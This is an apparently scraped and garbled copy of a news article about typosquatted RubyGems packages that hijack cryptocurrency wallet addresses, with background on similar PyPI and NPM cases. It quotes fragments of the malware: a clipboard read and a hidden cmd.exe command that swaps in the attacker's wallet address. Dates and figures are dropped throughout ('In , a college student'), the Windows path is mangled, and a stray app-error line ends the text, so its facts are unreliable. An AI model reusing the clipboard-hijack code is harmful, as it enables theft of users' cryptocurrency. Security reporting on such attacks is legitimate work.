Doppelgängers –
Bitcoin currency stealer was downloaded thousands of times.
Dan Goodin – Apr , (4:) (UTC UTC)
text=objHTML.ParentWindow.ClipboardData.GetData (“text”)
The script then checks if the clipboard data matches the format of a cryptocurrency wallet address. If it does, it replaces the address with an attacker-controlled one “1JkU5XdNLji4Ugbb8agEWL1ko5US (nNmc ”in a hidden window using the following command: WScript.Shell run “C: Windows System 45 cmd.exe / c echo 1JkU5XdNLji4Ugbb8agEWL1ko5US nNmc | clip “, 0 With this, the threat actor is trying to redirect all potential cryptocurrency transactions to their wallet address. At the time of writing this blog, seemingly no transactions were made for this wallet.RubyGems maintainers did not respond to an email seeking comment.
The latest of several It’s by no means the first time people have used typosquatting to sneak malicious packages into widely used open source repositories. In , a college student uploaded sketchy scripts to RubyGems, PyPi, and NPM, which are community websites for developers of the Python, Ruby, and JavaScript programming languages, respectively. A phone-home feature in the student’s scripts showed that the imposter code was
executed more than 158, times on more than , separate domains
, and more than half the time his code was given all-powerful administrative rights. Two of the affected domains ended in .mil, an indication that people inside the US military had run his script. Attackers quickly adopted the technique. In , an attackersneaked a clipboard hijacker into PyPi . The malicious package was titled “Colourama” and looked similar to Colorama, which is one of the top – 45 most-downloaded legitimate modules in the Python repository. The malicious package was downloaded 725 times, not including downloads from mirror sites.
A month later, attackers managed to pull off an even more impressive feat when they sneaked a (bitcoin-stealing backdoor into event-stream , a code library with 2 million downloads from the NPM repository. Developers of a currency wallet called CoPay incorporated the malicious library into updates and warned that any private keys trusted with the tainted versions should be considered compromised.
“There are very few protections out there for software developers to make sure that packages they install from these repositories are malware free, Pericin, the ReversingLabs cofounder, said. “There is a huge gap in the market at the moment which is being exploited by malware authors.”
GIPHY App Key not set. Please check settings